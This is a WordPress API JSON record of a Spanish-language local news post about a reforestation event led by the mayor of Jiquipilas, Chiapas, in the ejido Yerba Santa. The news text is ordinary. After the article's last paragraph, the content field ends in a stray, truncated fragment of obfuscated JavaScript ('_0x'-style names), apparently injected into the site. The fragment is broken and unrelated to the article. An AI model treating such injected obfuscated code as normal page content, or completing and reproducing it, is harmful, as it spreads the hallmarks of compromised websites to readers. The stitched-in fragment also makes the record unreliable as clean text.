{"id":4526,"date":"2022-08-18T03:53:48","date_gmt":"2022-08-18T03:53:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4526"},"modified":"2022-08-18T03:53:49","modified_gmt":"2022-08-18T03:53:49","slug":"hugo-lazaro-encabezo-reforestacion-en-el-ejido-yerba-santa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4526","title":{"rendered":"Hugo L\u00e1zaro encabez\u00f3 \u201cReforestaci\u00f3n\u201d en el ejido Yerba Santa"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"563\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220817-WA0017.jpg\" alt=\"\" class=\"wp-image-4527\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220817-WA0017.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220817-WA0017-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220817-WA0017-768x432.jpg 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>\u2022 La reforestaci\u00f3n es primordial para el medio ambiente y con estas acciones reforzamos la ecolog\u00eda.\u2022 El edil agradeci\u00f3 y reconoci\u00f3 la participaci\u00f3n de las y los habitantes del ejido por sumarse a esta campa\u00f1a. Jiquipilas, Chiapas.- Considerando que los \u00e1rboles son una soluci\u00f3n para combatir los problemas ambientales y de esta forma poder lograr un equilibrio ecol\u00f3gico del planeta, el Gobierno Municipal que preside C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez encabez\u00f3 una &#8220;Reforestaci\u00f3n\u201d en el ejido Yerba Santa.El Alcalde se\u00f1al\u00f3 que el objetivo es activar la educaci\u00f3n ambiental, cuidar las \u00e1reas verdes y hacer conciencia sobre la importancia que tiene la protecci\u00f3n al ecosistema. \u201cCon la participaci\u00f3n responsable de todos en este tema de vital importancia podemos revertir el cambio clim\u00e1tico con la reforestaci\u00f3n y ustedes aqu\u00ed la zona rural juegan un papel importante en estas acciones\u201d, enfatiz\u00f3 Hugo L\u00e1zaro.Dentro de las cientos de especies que fueron plantadas en esta zona del ejido Yerba Santa, se encuentran las maderables como Matilisguate, Boj\u00f3n y Cedro, a las cuales se les dar\u00e1 puntual seguimiento para su correcto desarrollo forestal.El Presidente Municipal, refiri\u00f3 que es fundamental hoy m\u00e1s que nunca que el hombre desarrolle y fomente estrategias para tratar de minimizar la crisis ecol\u00f3gica que pone en riesgo la vida misma y la estabilidad del planeta, por lo que Invit\u00f3 a las y los habitantes a cuidar el medio ambiente y dar seguimiento a los \u00e1rboles que se reforestaron. En este evento el Edil jiquipilteco estuvo acompa\u00f1ado del Comisariado Ejidal Marcos G\u00f3mez P\u00e9rez, as\u00ed como de habitantes de la comunidad entre otros funcionarios e invitados especiales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 La reforestaci\u00f3n es primordial para el medio ambiente y con estas acciones reforzamos la ecolog\u00eda.\u2022 El edil agradeci\u00f3 y reconoci\u00f3 la participaci\u00f3n de las y los habitantes del ejido por sumarse a esta campa\u00f1a. Jiquipilas, Chiapas.- Considerando que los \u00e1rboles son una soluci\u00f3n para combatir los problemas ambientales y de esta forma poder lograr &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4527,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4526","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4526"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4526\/revisions"}],"predecessor-version":[{"id":4528,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4526\/revisions\/4528"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4527"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4526"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}